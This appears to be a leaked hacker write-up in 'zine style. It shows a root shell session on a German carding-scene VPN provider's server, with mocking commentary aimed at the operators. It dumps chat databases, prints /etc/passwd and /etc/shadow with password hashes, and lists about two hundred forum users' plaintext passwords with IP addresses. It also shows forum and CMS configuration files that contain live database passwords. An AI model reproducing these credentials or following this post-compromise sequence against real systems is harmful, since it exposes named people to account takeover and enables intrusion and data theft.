 public | ofgroupprop          | table | openfire
 public | ofgroupuser          | table | openfire
 public | ofid                 | table | openfire
 public | ofmessagearchive     | table | openfire
 public | ofmucaffiliation     | table | openfire
 public | ofmucconversationlog | table | openfire
 public | ofmucmember          | table | openfire
 public | ofmucroom            | table | openfire
 public | ofmucroomprop        | table | openfire
 public | ofmucservice         | table | openfire
 public | ofmucserviceprop     | table | openfire
 public | ofoffline            | table | openfire
 public | ofpresence           | table | openfire
 public | ofprivacylist        | table | openfire
 public | ofprivate            | table | openfire
 public | ofproperty           | table | openfire
 public | ofpubsubaffiliation  | table | openfire
 public | ofpubsubdefaultconf  | table | openfire
 public | ofpubsubitem         | table | openfire
 public | ofpubsubnode         | table | openfire
 public | ofpubsubnodegroups   | table | openfire
 public | ofpubsubnodejids     | table | openfire
 public | ofpubsubsubscription | table | openfire
 public | ofremoteserverconf   | table | openfire
 public | ofroster             | table | openfire
 public | ofrostergroups       | table | openfire
 public | ofrrds               | table | openfire
 public | ofsaslauthorized     | table | openfire
 public | ofsecurityauditlog   | table | openfire
 public | ofuser               | table | openfire
 public | ofuserflag           | table | openfire
 public | ofuserprop           | table | openfire
 public | ofvcard              | table | openfire
 public | ofversion            | table | openfire
(38 rows)

openfire=# COPY ofmessagearchive TO '/tmp/m_lawgs';
COPY 2190

openfire=# COPY ofuser TO '/tmp/u_lawgs';
COPY 313

openfire=# \q

# pg_dump -U openfire openfire > /tmp/full_db
Password: 
 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
|    fickmaus@jabber-swissfaking.net:                                |
|       na carders brauch diesesmal wohl länger wa?                  |
|    triple@jabber-swissfaking.net:                                  |
|       Jo                                                           |
|       die haben immer noch ka                                      |
|       wie die lücke ist                                            |
|       ^^                                                           |
|____________________________________________________________________|

Why  don't  you  shut  up  and  go  administrate   your   own   board,
smarty-pants? Owait, Garcon! Make us a sandwich instead, you  seem  to
know your stuff when it comes to ordering a la carte.

                                                         ,;~;,        
                                                        _/\           
                                                        \  )          
                                                (\\      ())          
                                                /';;,,  // |          
-------=========={  Vpn24.org  }========))))))))))))))=m(  )_ __      
                                               | ,(.' '~/()' '  '\    
                                                ~  |     ||(      );, 
                                                   (   ,;.)-\    / ';,
                                                    \ (       \ (     
                                                     ||         \\    
                                                    /_(         /_(   
_____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
|  Liebe Carders.CC Member,                                          |
|                                                                    |
|  Wir sind wieder da und haben euch Top Angebote mitgebracht :)     |
|                                                                    |
|  Wir  bieten euch 100% non-logging OpenVPN, Socks5 und SSH Socks   |
|  Zugang auf  unserem eigenen dedicated Server welcher in Russland  |
|  steht, absolut  unantastbar für Deutsche Behörden. Unser          |
|  kompletter Service ist automatisiert, ihr könnt also schon in     |
|  wenigen Minuten 100% anonym unterwegs sein.                       |
|                                                                    |
|  ...                            |                                  |
|  VPN                            |       Socks5                     |
|  Secure Connection              |       Secure Connection          |
|  Encryption      AES-1024       |       Encryption      AES-512    |
|_________________________________|__________________________________|

They offer the  carders.cc members  100% non-logging proxies  on their
own dedicated server which is located in Russia. They say  that  there
is no way for German authorities to get access to it  and  that  their
service is fully automatic. The vpn  connections  are  encrypted  with
AES-1024 and the socks5 proxies are encrypted with AES-512.

And that sounds awesome! You even invented two new  encryptions? Let's
have a look at your webserver first, but, again, before we start, here
is a list (user:plain password:ip:date) from your website:

janitor1:nroknetsr3g:87.118.118.37:January 6, 2011, 8:33 pm
jack123:heimatbrief:92.241.190.230:January 3, 2011, 3:54 pm
shore:shoreshore:202.71.103.246:January 6, 2011, 6:28 pm
hansi3000:w2z_RKDUU:212.117.177.110:January 5, 2011, 4:10 pm
tarnung91:frauholle49:78.52.52.123:January 4, 2011, 11:54 am
djdalio:123123:95.33.214.37:January 3, 2011, 5:03 pm
selfcut:rittersport:88.76.106.196:January 3, 2011, 1:10 pm
donkey:YX!"as78:84.183.121.124:January 3, 2011, 9:07 am
obama123:derneger123:84.137.90.85:January 5, 2011, 5:43 pm
neon1011:hassen11:91.43.254.141:January 3, 2011, 11:54 am
f18black:pizza1:91.33.20.147:January 6, 2011, 2:37 pm
hilli:ickeget6:85.17.161.84:January 6, 2011, 2:35 pm
schmidi327:g5fkigd2:95.33.42.207:January 6, 2011, 11:39 pm
12dima12:jafCc8Nk:212.117.172.231:January 3, 2011, 9:03 pm
blackmatrix:o75ev14J:87.185.157.32:January 7, 2011, 4:16 pm
hanswurst:volkan:92.76.11.157:January 5, 2011, 10:41 pm
ginal406:e*!ohWt7:92.241.190.253:January 3, 2011, 8:14 pm
edgeee:azerty123:92.241.165.69:January 7, 2011, 1:00 am
loowmanz:lowlowlow123:93.202.153.197:January 3, 2011, 7:51 am
basha:kriminell:92.241.165.69:January 4, 2011, 9:42 pm
zezol:4iP]XT4)om:79.170.124.248:January 3, 2011, 8:02 am
duden:galaxy:92.241.190.253:January 6, 2011, 9:35 pm
pill3:jackass123:212.117.172.231:January 5, 2011, 10:57 am
darkt0wn:marvin88:217.72.222.183:January 5, 2011, 8:06 pm
pyrodeath:b35ngf%:78.48.108.252:January 4, 2011, 12:55 pm
conviction:ichbingeil:92.241.190.253:January 3, 2011, 5:12 pm
blade1932:exaguqa5:92.241.190.253:January 3, 2011, 2:51 pm
hackbart2:twd2005:92.241.190.253:January 3, 2011, 10:22 am
juryrusski:jocklerhans:77.0.30.113:January 4, 2011, 8:47 pm
h1xx3r:trustno1:84.23.74.92:January 4, 2011, 9:04 pm
romulus89:192837465:80.123.42.135:January 3, 2011, 12:26 pm
deluxe0160:tomtom:92.228.173.201:January 7, 2011, 10:08 pm
hanshans123:hanshans:212.117.161.80:January 4, 2011, 12:43 am
sanisan:19n4schk4tz385:84.184.246.137:January 6, 2011, 12:15 am
pan1c:tigerpommes:92.241.190.253:January 5, 2011, 11:43 am
revar:puppetteer:92.241.165.69:January 4, 2011, 1:45 pm
epoepo:union84:92.241.190.253:January 4, 2011, 1:37 pm
offlinejack:Jodelhe1n:88.76.253.194:January 6, 2011, 8:57 pm
weedtwo:70301995:92.241.190.253:January 6, 2011, 5:18 pm
pann0:pannopasch0:79.198.146.182:January 6, 2011, 6:02 pm
eve1992:sacred:88.67.149.150:January 6, 2011, 10:03 am
hi:suPPort_masterPass88:212.117.165.197:January 3, 2011, 2:27 am
det0x:veronika:92.241.190.253:January 4, 2011, 3:19 pm
malakas2:internet:212.117.172.231:January 3, 2011, 5:34 am
fahne:23102007:78.50.87.217:January 4, 2011, 6:30 pm
alanka:159369:85.25.165.138:January 3, 2011, 9:50 am
pfanner:deinemudda:92.204.37.77:January 3, 2011, 12:53 pm
delphinko:aLLanKoy0:87.118.118.37:January 3, 2011, 8:20 pm
timetraveller:a3Pq71ryK1:79.229.42.88:January 7, 2011, 8:56 pm
logg23:1q2w3e4r5t6z7u8i:212.117.172.231:January 6, 2011, 4:49 pm
teppich:oog4weeT1acu:157.95.211.201:January 5, 2011, 12:49 am
andreas7411:123456789a:88.65.104.195:January 3, 2011, 10:23 pm
n3v10:uLeiDee7:212.117.172.231:January 4, 2011, 1:24 pm
frezorx:123456:92.231.125.179:January 4, 2011, 3:11 am
winkel72:berlin123:193.107.16.122:January 3, 2011, 9:34 pm
trinx:meli1993:92.241.190.253:January 4, 2011, 3:38 pm
c4sh1:mkz4kzj:80.121.99.73:January 7, 2011, 1:04 am
tais46:spoiler:69.172.133.146:January 3, 2011, 1:36 pm
whazun:daspw123:93.195.74.65:January 4, 2011, 11:44 am
anubis:xy200xyx:79.213.81.205:January 5, 2011, 8:16 pm
hugo21:901051901051:91.54.21.252:January 4, 2011, 12:14 pm
doomlord:oxford:91.51.166.181:January 3, 2011, 6:53 pm
sense88:pitbull:91.66.61.177:January 5, 2011, 7:11 am
heavygun:vpn24private:91.6.0.76:January 6, 2011, 10:26 am
tombi:Spiele:92.241.190.253:January 5, 2011, 1:08 pm
messias91:qaywsx:92.241.165.69:January 6, 2011, 4:29 pm
lryzx33:deutschlandhackedbysolme:91.121.82.175:January 4, 2011, 6:04 pm
dre4m90:chillen:188.104.227.204:January 5, 2011, 10:56 am
slumski:Harley23:109.193.150.182:January 3, 2011, 7:55 pm
theultralooser:921234:92.241.190.81:January 4, 2011, 8:35 pm
keystyle:firatfirat911:92.241.165.69:January 6, 2011, 7:33 pm
hund123456:hund123456:46.114.42.253:January 4, 2011, 9:56 pm
chiller1337:episodeone:92.241.190.253:January 5, 2011, 11:48 am
turboprinz:886988:93.211.71.197:January 5, 2011, 9:25 pm
silverfox:tamil94thenud*:93.218.92.119:January 4, 2011, 9:22 am
ikas2:k7gh8uc3ph:77.11.24.196:January 7, 2011, 12:33 am
mrmcfly:vpn2426112004:213.163.65.50:January 6, 2011, 4:53 pm
weedtaxi:dura2131:93.222.176.113:January 4, 2011, 8:17 pm
boxer1:daniel:188.193.12.78:January 5, 2011, 7:02 pm
newb1:hans1234:92.241.165.69:January 6, 2011, 2:56 pm
bichlord:michael12B:94.217.109.99:January 4, 2011, 5:52 pm
neonaut:derotter:212.117.161.80:January 3, 2011, 11:45 am
abs0lut:liberate012:92.241.165.69:January 3, 2011, 3:53 pm
thalia:stachnik:81.210.157.177:January 4, 2011, 12:12 pm
dudgeri:dude123:212.117.165.197:January 3, 2011, 10:56 am
arider:amp483:77.189.15.2:January 4, 2011, 8:54 pm
iodas1:hallo123:87.147.65.130:January 4, 2011, 8:42 pm
hans2000:yxcvbnm22:84.59.141.5:January 6, 2011, 12:05 am
jungeguter:toko29473:79.195.50.220:January 3, 2011, 4:40 pm
th3sh4dow:han2jo4cu:88.69.160.243:January 7, 2011, 7:26 pm
pwnny:faker123:77.176.234.57:January 4, 2011, 9:16 am
papo00:papo0815:84.119.53.9:January 5, 2011, 8:24 pm
thehen:duhurensohn:77.22.65.135:January 3, 2011, 11:21 pm
random9999:dfds67621dd9999:199.48.147.41:January 3, 2011, 7:03 pm
zorator:1q2w3e4r:91.121.72.221:January 3, 2011, 7:48 pm
xr34ct0r:spelock1909:212.117.163.21:January 3, 2011, 7:56 pm
deesr:timsilinsi:93.94.245.2:January 7, 2011, 6:19 pm
juliasutter:01305806:91.89.165.7:January 3, 2011, 5:22 pm
davidche:miezekatze:95.157.23.65:January 4, 2011, 10:37 pm
k1xy0:1qayxcv:92.75.20.99:January 5, 2011, 2:20 am
hyperion:sexysexy:212.117.172.231:January 3, 2011, 11:17 pm
emrano:go,schosch:92.241.165.69:January 3, 2011, 1:58 pm
razer111:hunter1:95.211.99.92:January 3, 2011, 11:30 am
asus123:intelatom:82.195.232.218:January 7, 2011, 4:41 pm
fruchtii:a1b2c3d4:87.118.118.37:January 3, 2011, 8:20 pm
mcott:123456:92.241.165.69:January 3, 2011, 1:38 pm
input:kingild:188.193.40.32:January 3, 2011, 6:15 pm
snowghost:7LKCFwm:78.53.114.62:January 5, 2011, 12:05 pm
fuckyou:fuckyou:212.117.177.110:January 6, 2011, 11:48 pm
snowmann:passwort:84.133.162.225:January 6, 2011, 7:43 am
nate23:hallo123:188.195.206.85:January 6, 2011, 4:10 am
smilenike:nippellecken:92.241.190.253:January 6, 2011, 10:33 pm
mastablasta:p4r4d153c1ty:62.141.39.222:January 3, 2011, 10:15 am
beware:er.,fs:93.213.21.9:January 3, 2011, 6:45 pm
5liter:Walter50:87.118.118.37:January 3, 2011, 4:49 am
d3struction:samson123:109.77.48.51:January 3, 2011, 4:48 pm
traden90:1234abcder:92.241.190.253:January 3, 2011, 5:46 pm
kaliber:kaliber44:79.218.97.68:January 6, 2011, 1:15 pm
styles:736286:212.117.172.231:January 3, 2011, 2:53 pm
thatslife:katze2:80.143.108.186:January 3, 2011, 11:49 pm
n8zm5gg:kfkfgkfg1:199.48.147.40:January 6, 2011, 12:58 pm
sparkasse:ficken:212.117.172.231:January 5, 2011, 2:17 am
p1r0x:timtimtim12:88.153.214.11:January 5, 2011, 1:31 pm
reideen:1kimmerle2:92.241.190.253:January 3, 2011, 10:03 am
shadowgamer:lumega34:84.19.169.236:January 6, 2011, 10:32 pm
kasanova:gentleman:92.241.190.253:January 4, 2011, 11:25 pm
anonymius:Zuu97ii83!!:78.55.211.145:January 7, 2011, 3:06 pm
thepu:asdf545:91.60.211.53:January 6, 2011, 4:26 pm
ixam123:chichi12345:79.240.150.109:January 4, 2011, 10:31 am
scanner1337:NL0AMGGG:93.221.58.122:January 3, 2011, 10:43 pm
xelni:kir123:92.241.190.253:January 6, 2011, 8:06 pm
nexus88:01230123:80.131.74.225:January 6, 2011, 2:10 am
meball:MeBall456:92.241.168.90:January 4, 2011, 7:39 pm
fuckdawn:former300:92.241.190.253:January 3, 2011, 12:06 pm
kdkdkd:abcabc123:85.177.152.182:January 4, 2011, 7:34 pm
nicvandebigdick:mezzomix:93.219.15.61:January 6, 2011, 3:52 am
alfalfa:57596300:85.176.120.193:January 3, 2011, 3:53 pm
kevin4ual:iloveu:92.241.190.253:January 4, 2011, 10:25 pm
simonsemmler:gangbang:92.78.143.171:January 3, 2011, 10:29 am
kuchen:asdasdasd:212.117.165.197:January 3, 2011, 2:21 am
peters:Bobchen2:77.181.106.195:January 3, 2011, 6:41 pm
anoymius:Zuu97ii83!!:78.55.211.145:January 7, 2011, 3:05 pm
pitbull69:9g3qW$23r$SZg8§$2GD3rg83:87.122.14.183:January 5, 2011, 8:45 pm
aschi2131:dura2131:93.222.176.113:January 4, 2011, 8:17 pm
testuser0:hurensohn:93.94.245.129:January 7, 2011, 4:20 am
makko:Lq=D)G92T2:79.228.238.216:January 3, 2011, 3:05 am
slash:busenbusen:82.195.232.218:January 4, 2011, 12:50 pm
thereplacer:fuckmyass:93.228.147.44:January 4, 2011, 6:48 pm
xxx3xxx4:derneger:92.241.190.253:January 5, 2011, 12:51 am
faxxer:hdgdla:90.134.58.200:January 5, 2011, 8:10 pm
magi007:imcool123:80.121.47.36:January 3, 2011, 2:47 pm
crack:novoline21:88.73.103.201:January 7, 2011, 12:55 am
bekanntmachungen:BEKANNTMACHUNGEN:89.204.137.175:January 3, 2011, 3:32 pm
ripit:gangbang123:212.117.172.231:January 4, 2011, 12:34 pm
mttsmtts:IgjTu0800zSv:93.134.103.213:January 3, 2011, 2:08 pm
dingdong:progamer:79.245.244.195:January 4, 2011, 12:13 pm
sa1nt:krankheit:91.7.92.101:January 5, 2011, 3:12 am
skilled:12345asdfg:94.23.114.4:January 4, 2011, 11:22 am
juden:test123:95.208.15.191:January 6, 2011, 12:13 pm
lolcat:i26nv1:79.204.36.137:January 3, 2011, 4:43 pm
docstrange:.denis.1203.:78.34.37.56:January 3, 2011, 3:56 pm
habadu:268413597:79.226.244.159:January 7, 2011, 12:05 am
loldielol:server1:91.55.112.62:January 5, 2011, 6:07 pm
kolumbus:infanterist2000:95.119.12.201:January 3, 2011, 8:31 pm
freefall:88866654:87.174.242.241:January 5, 2011, 10:27 am
lpboy:minkin:217.23.6.162:January 5, 2011, 8:10 pm
freaky123:05151942662:77.187.60.32:January 6, 2011, 12:32 am
kanye:Undertaker:92.241.165.69:January 5, 2011, 10:27 pm
codered:3081994:84.62.202.48:January 5, 2011, 4:21 pm
derboss:derboss:78.49.17.208:January 3, 2011, 8:52 pm
mandy:hallo123456:91.58.51.156:January 4, 2011, 3:58 pm
robmocdoc:881562:87.122.33.146:January 6, 2011, 3:07 pm
mcknad:masterxx1994:92.194.116.34:January 5, 2011, 6:45 pm
dre4m:gulliox90:188.104.236.248:January 4, 2011, 6:26 pm
matzeyooo:heheyo12345:212.117.172.231:January 6, 2011, 3:03 am
kerber0s:brennberg-1993:93.240.244.74:January 5, 2011, 5:43 pm
lenox26:250384:95.211.99.91:January 3, 2011, 6:41 pm
sidosido123:sidosido123:78.35.50.188:January 5, 2011, 1:53 am
mrsocke:fckgwrhqq2:77.189.137.162:January 4, 2011, 5:45 pm
schatten123:stinker:93.208.70.28:January 3, 2011, 6:56 pm
ev0lein:scheisripper:87.118.120.182:January 3, 2011, 5:53 pm
gweojk904trj:AOGWD55GMpUqCtB6Gsw2:92.241.190.253:January 4, 2011, 9:29 pm
wolfgang:florian90:85.178.145.194:January 3, 2011, 1:33 pm
cronic:67öänht53snjl:207.126.166.242:January 3, 2011, 10:04 pm
w333d:w333d1:92.241.168.90:January 3, 2011, 11:18 am
genetik10:s09101987:78.94.194.123:January 3, 2011, 2:19 pm
elektro:elektrisch1:77.12.190.94:January 3, 2011, 5:51 pm
amobios:welensitich9872582:89.149.242.16:January 3, 2011, 2:50 am
mablutze:tobias12:91.112.18.154:January 4, 2011, 8:43 pm
artist:yucatan1:82.198.80.81:January 4, 2011, 2:33 pm
dukeraider:muschi:188.193.200.182:January 3, 2011, 10:06 am
frankylo:Franky123456789*:95.211.13.145:January 3, 2011, 5:12 pm
dusa123:123456789:79.246.188.21:January 5, 2011, 1:14 am
asdfghjkl:carders231:84.161.40.27:January 5, 2011, 3:50 pm

# uname -a
Linux morphy 2.6.18-164.11.1.el5.028stab068.3 #1 SMP Wed Feb 17 15:22:30 MSK 2010 x86_64 GNU/Linux

# id
uid=0(root) gid=0(root)

# cat /etc/issue
Debian GNU/Linux 5.0 \n \l

# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:102:104:MySQL Server,,,:/var/lib/mysql:/bin/false
Debian-exim:x:103:105::/var/spool/exim4:/bin/false
proftpd:x:104:65534::/var/run/proftpd:/bin/false
ftp:x:105:65534::/home/ftp:/bin/false
hdf:x:1000:1000::/home/hdf:/bin/sh
root:$1$SwmLmdGE$Unk7WkRpv7NF3O/0YSTCh/:14849:0:99999:7:::
daemon:*:14237:0:99999:7:::
bin:*:14237:0:99999:7:::
sys:*:14237:0:99999:7:::
sync:*:14237:0:99999:7:::
games:*:14237:0:99999:7:::
man:*:14237:0:99999:7:::
lp:*:14237:0:99999:7:::
mail:*:14237:0:99999:7:::
news:*:14237:0:99999:7:::
uucp:*:14237:0:99999:7:::
proxy:*:14237:0:99999:7:::
www-data:*:14237:0:99999:7:::
backup:*:14237:0:99999:7:::
list:*:14237:0:99999:7:::
irc:*:14237:0:99999:7:::
gnats:*:14237:0:99999:7:::
nobody:*:14237:0:99999:7:::
libuuid:!:14237:0:99999:7:::
sshd:*:14237:0:99999:7:::
mysql:!:14647:0:99999:7:::
Debian-exim:!:14647:0:99999:7:::
proftpd:!:14655:0:99999:7:::
ftp:$1$0LKSrIAD$rt1vOaeYC8GrKvVzI.T6s.:14662:0:99999:7:::
hdf:$1$RQkebH9N$LrPDCbeYn3.czmOpaM8nn.:14662:0:99999:7:::

# cd / && ls -la
total 168
drwxr-xr-x 21 root root  4096 Nov 18 23:11 .
drwxr-xr-x 21 root root  4096 Nov 18 23:11 ..
drwxr-xr-x 10 root root  4096 Feb 15  2010 SMF
lrwxrwxrwx  1 root root    39 Nov 13 13:09 aquota.group -> /proc/vz/vzaquota/0000001e/aquota.group
lrwxrwxrwx  1 root root    38 Nov 13 13:09 aquota.user -> /proc/vz/vzaquota/0000001e/aquota.user
-rwxr-xr-x  1 root root   122 Aug 21 17:30 backup.sh
drwxr-xr-x  2 root root  4096 May 13  2010 bin
drwxr-xr-x  2 root root  4096 Dec  4  2008 boot
drwxr-xr-x  4 root root  4096 Jan  7 06:25 dev
drwxr-xr-x 57 root root  4096 Nov 13 13:09 etc
drwxr-xr-x  4 root root  4096 Feb 15  2010 home
drwxr-xr-x 10 root root  4096 Feb 15  2010 lib
lrwxrwxrwx  1 root root     4 Mar 15  2010 lib64 -> /lib
drwxr-xr-x  2 root root  4096 Dec 24  2008 media
drwxr-xr-x  2 root root  4096 Dec  4  2008 mnt
drwxr-xr-x  2 root root  4096 Dec 24  2008 opt
dr-xr-xr-x 55 root root     0 Nov 13 13:09 proc
drwx------  6 root root  4096 Jan  7 22:18 root
drwxr-xr-x  2 root root  4096 Feb  7  2010 sbin
drwxr-xr-x  2 root root  4096 Sep 16  2008 selinux
drwxr-xr-x  2 root root  4096 Dec 24  2008 srv
drwxr-xr-x  3 root root     0 Nov 13 13:09 sys
drwxrwxrwt  4 root root  4096 Jan  7 18:22 tmp
drwxr-xr-x 11 root root  4096 Dec 24  2008 usr
drwxr-xr-x 14 root root  4096 Mar 15  2010 var
-rwxr-xr-x  1 root root 83749 Sep  8 17:15 xgoogler

# cat backup.sh 
#!/bin/bash

name=`date | sed -e "s/ /_/g"`
name=`echo "/${name}__vpn24org_backup.tgz"`
tar cfvz "$name" /root/ /var/www/

# cd /var/www && ls -la
total 40
drwxr-xr-x  9 root root 4096 Dec 28 02:33 .
drwxr-xr-x 14 root root 4096 Mar 15  2010 ..
drwxr-xr-x  2 root root 4096 Nov 15 17:35 a
drwxrwxrwx  3 root root 4096 Oct 13 23:26 dreckrebea12313
drwxrwxrwx  3 root root 4096 Apr 15  2010 dreckrebea12313123123131313131312313123
-rwxrwxrwx  1 root root    1 Sep 16 23:19 index.php
drwxr-xr-x 16 root root 4096 Oct 17 22:20 sadas.org
drwxrwxrwx  4 root root 4096 Oct  1 09:18 scenecms.org
drwxr-xr-x  3 root root 4096 Dec 13 22:18 vpn24.org

# cd dreckrebea12313 && ls -la 
total 20
drwxrwxrwx 3 root root 4096 Oct 13 23:26 .
drwxr-xr-x 9 root root 4096 Dec 28 02:33 ..
-rw-r--r-- 1 root root  132 Oct 13 23:15 adsads.rar
-rw-r--r-- 1 root root   35 Mar 15  2010 index.php
drwxrwxrwx 3 root root 4096 Jan  7 22:20 web

# cd web && ls -la
total 40
drwxrwxrwx 3 root root  4096 Jan  7 22:20 .
drwxrwxrwx 3 root root  4096 Oct 13 23:26 ..
drwsrwsrwt 9 root root  4096 Apr 22  2010 board
-rwsrwsrwt 1 root root  1033 Apr 19  2010 index.php     #+s root? Holy crap!
-rw-r--r-- 1 root root     0 Apr 22  2010 ipinfo.html
-rw-r--r-- 1 root root 23564 Apr 19  2010 sc.png

# cd board && ls -la
total 228
drwsrwsrwt 9 root root  4096 Apr 22  2010 .
drwxrwxrwx 3 root root  4096 Jan  7 22:20 ..
drwxrwxrwx 3 root root  4096 Apr 22  2010 Packages
-rw-r--r-- 1 root root 74243 Feb 14  2010 SSI.php
-rwxrwxrwx 1 root root  3998 Apr 22  2010 Settings.php
-rwxrwxrwx 1 root root  3998 Apr 22  2010 Settings_bak.php
drwxrwxrwx 5 root root  4096 Apr 22  2010 Smileys
drwxr-sr-x 2 root root  4096 Apr 22  2010 Sources
drwxrwxrwx 8 root root  4096 Apr 22  2010 Themes
-rwxrwxrwx 1 root root  3343 Jun  5  2005 agreement.txt
drwxrwxrwx 2 root root  4096 Apr 24  2010 attachments
drwxrwxrwx 4 root root  4096 Apr 22  2010 avatars
drwxrwxrwx 2 root root 12288 Dec 28 02:20 cache
-rw-r--r-- 1 root root 15347 Feb 14  2010 index.php
-rw-r--r-- 1 root root  3975 Jan  6  2009 license.txt
-rw-r--r-- 1 root root  2650 Feb 23  2010 news_readme.html
-rw-r--r-- 1 root root 12350 Feb 23  2010 readme.html
-rw-r--r-- 1 root root 30030 Feb 14  2010 ssi_examples.php
-rw-r--r-- 1 root root  5909 Jan  1  2010 ssi_examples.shtml
-rw-r--r-- 1 root root 10147 Feb 14  2010 subscriptions.php

# cat Settings.php 
<?php
/**********************************************************************************
* Settings.php                                                                    *
***********************************************************************************
* SMF: Simple Machines Forum                                                      *
* Open-Source Project Inspired by Zef Hemel (zef@zefhemel.com)                    *
* =============================================================================== *
* Software Version:           SMF 2.0 RC3                                         *
* Software by:                Simple Machines (http://www.simplemachines.org)     *
* Copyright 2006-2010 by:     Simple Machines LLC (http://www.simplemachines.org) *
*           2001-2006 by:     Lewis Media (http://www.lewismedia.com)             *
* Support, News, Updates at:  http://www.simplemachines.org                       *
***********************************************************************************
* This program is free software; you may redistribute it and/or modify it under   *
* the terms of the provided license as published by Simple Machines LLC.          *
*                                                                                 *
* This program is distributed in the hope that it is and will be useful, but      *
* WITHOUT ANY WARRANTIES; without even any implied warranty of MERCHANTABILITY    *
* or FITNESS FOR A PARTICULAR PURPOSE.                                            *
*                                                                                 *
* See the "license.txt" file for details of the Simple Machines license.          *
* The latest version can always be found at http://www.simplemachines.org.        *
**********************************************************************************/

########## Maintenance ##########
# Note: If $maintenance is set to 2, the forum will be unusable!  Change it to 0 to fix it.
$maintenance = 0;   # Set to 1 to enable Maintenance Mode, 2 to make the forum untouchable. (you'll have to make it 0 again manually!)
$mtitle = 'Maintenance Mode';  # Title for the Maintenance Mode message.
$mmessage = 'Okay faithful users...we\'re attempting to restore an older backup of the database...news will be posted once we\'re back!';       # Description of why the forum is in maintenance mode.

########## Forum Info ##########
$mbname = 'SceneCrypt';  # The name of your forum.
$language = 'english';   # The default language file set for the forum.
$boardurl = 'http://scenecrypt.org/board';   # URL to your forum's folder. (without the trailing /!)
$webmaster_email = 'admin@admin.de';    # Email address to send emails from. (like noreply@yourdomain.com.)
$cookiename = 'SMFCookie410';  # Name of the cookie to set for authentication.

########## Database Info ##########
$db_type = 'mysql';
$db_server = 'localhost';
$db_name = 'smf13';
$db_user = 'root';
$db_passwd = 'QkZorIZZC5e';
$ssi_db_user = '';
$ssi_db_passwd = '';
$db_prefix = 'smf13_';
$db_persist = 0;
$db_error_send = 1;

########## Directories/Files ##########
# Note: These directories do not have to be changed unless you move things.
$boarddir = '/var/www/scenecrypt.org/web/board';  # The absolute path to the forum's folder. (not just '.'!)
$sourcedir = '/var/www/scenecrypt.org/web/board/Sources';    # Path to the Sources directory.
$cachedir = '/var/www/scenecrypt.org/web/board/cache';   # Path to the cache directory.

########## Error-Catching ##########
# Note: You shouldn't touch these settings.
$db_last_error = 0;


# Make sure the paths are correct... at least try to fix them.
if (!file_exists($boarddir) && file_exists(dirname(__FILE__) . '/agreement.txt'))
 $boarddir = dirname(__FILE__);
if (!file_exists($sourcedir) && file_exists($boarddir . '/Sources'))
 $sourcedir = $boarddir . '/Sources';
if (!file_exists($cachedir) && file_exists($boarddir . '/cache'))
 $cachedir = $boarddir . '/cache';

$db_character_set = 'utf8';

# cd /var/www/dreckrebea12313123123131313131312313123/ && ls -la
total 16
drwxrwxrwx 3 root root 4096 Apr 15  2010 .
drwxr-xr-x 9 root root 4096 Dec 28 02:33 ..
-rw-r--r-- 1 root root   35 Mar 15  2010 index.php
drwxrwxrwx 4 root root 4096 Apr 15  2010 web

# cd web && ls -la
total 68
drwxrwxrwx 4 root root  4096 Apr 15  2010 .
drwxrwxrwx 3 root root  4096 Apr 15  2010 ..
-rwxrwxrwx 1 root root   983 Mar 15  2010 conf.php
drwxrwxrwx 3 root root  4096 May 11  2010 images
-rw-r--r-- 1 root root 42787 Apr 15  2010 index.php
-rw-r--r-- 1 root root     1 Apr 15  2010 index__.php
drwxrwxrwx 3 root root  4096 Mar 15  2010 psc

# cat conf.php 
<?php
define(_SceneCMS_footer, "SceneCMS v1.0");
define(_SceneCMS_admin,  "mimimi");
define(_SceneCMS_Host,   "localhost");
define(_SceneCMS_Username,  "qstore");
define(_SceneCMS_Password,  "4cFRwaLnt2qS2QSp");
define(_SceneCMS_Database,  "qstore");

mysql_connect(_SceneCMS_Host,_SceneCMS_Username,_SceneCMS_Password);
mysql_select_db(_SceneCMS_Database);


 function strFilter($text) {
    return (string)htmlentities($text);
 }

function sql_str_escape($str) {
  if(get_magic_quotes_gpc())
    stripslashes($str);
  return mysql_real_escape_string($str);
}

 function Logout() {
    $_SESSION['cms_name'] = "";
    $_SESSION['cms_validate'] = "";
    session_destroy();
    
 }

 function CheckLogin($killtrue) {

    if ($_SESSION['cms_name'] == "" or $_SESSION['cms_validate'] == "") {
   if($killtrue == 1 or $killtrue == "1") {
     echo '
     <script>
     window.location.href = "?";
     </script>
     ';
     die("No Access");
     exit();
    } 
     return "0";
    } else {
     return "1";
    }
 }
?>

# tar cvjf /tmp/psc.tar.bz2 psc/
psc/
psc/data/
psc/data/money-coin.png
psc/data/Webbrowser.class.php
psc/data/bg_code.jpg
psc/data/bg.jpg
psc/data/bg_lock.jpg
psc/data/bg_captcha.jpg
psc/index.html
psc/api.php
psc/cookie.txt

# cd /var/www/sadas.org/ && ls -la
total 5632
drwxr-xr-x 16 root root    4096 Oct 17 22:20 .
drwxr-xr-x  9 root root    4096 Dec 28 02:33 ..
